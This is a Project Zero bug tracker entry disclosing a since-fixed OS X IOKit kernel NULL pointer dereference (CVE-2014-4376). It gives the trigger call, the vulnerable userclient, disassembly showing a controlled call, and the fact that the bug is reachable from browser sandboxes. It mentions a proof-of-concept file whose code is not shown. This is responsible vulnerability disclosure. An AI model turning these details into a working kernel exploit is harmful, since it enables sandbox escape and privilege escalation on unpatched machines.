Monorail Project: project-zero Issues People Development process History Sign in
New issue
Advanced search Search tips
Note: Color blocks (like or ) mean that a user may not be available. Tooltip shows the reason.
Issue 31
Starred by 8 users
Status: Fixed
Owner:
cevans@google.com
Email to this user bounced
Closed: Sep 2014



Sign in to add a comment
 OS X IOKit kernel code execution due to NULL pointer dereference in IOAccelContext2::clientMemoryForType
Project Member Reported by ianbeer@google.com, Jun 12 2014 Back to list 
Calling IOConnectMapMemory with type=0 of userclient 0x100 of IOService "IntelAccelerator" hits the following exploitable kernel NULL pointer dereference:

 mov rdi, [r12+1D8h]      ; rdi := NULL
 mov rax, [rdi]           ; read vtable pointer from NULL
 call qword ptr [rax+20h] ; controlled call

See attached PoC which maps the NULL page and kernel panics calling a virtual function near 0x4141414141414141.

This userclient is reachable from the chrome GPU process sandbox and the safari renderer sandbox.
ig_video_main_map_memory_NULL.c
1.7 KB Download
Project Member Comment 1 by ianbeer@google.com, Jun 12 2014
Labels: Reported-2014-June-12 Id-607049399
Project Member Comment 2 by ianbeer@google.com, Aug 22 2014
Labels: Deadline-90
Project Member Comment 3 by ianbeer@google.com, Sep 10 2014
Labels: -Restrict-View-Commit Deadline-Exceeded PublicOn-2014-September-10
Deadline exceeded -- automatically derestricting
Comment 4 by cevans@google.com, Sep 23 2014
Labels: -Reported-2014-June-12 -PublicOn-2014-September-10 Reported-2014-Jun-12 PublicOn-2014-Sep-10 Fixed-2014-Sep-17 CVE-2014-4376
Status: Fixed
http://support.apple.com/kb/HT6443
Comment 5 by abmat...@gmail.com, Oct 2 2014 
I am really interested in knowing the tools/techniques used in testing for these security bugs.
Sign in to add a comment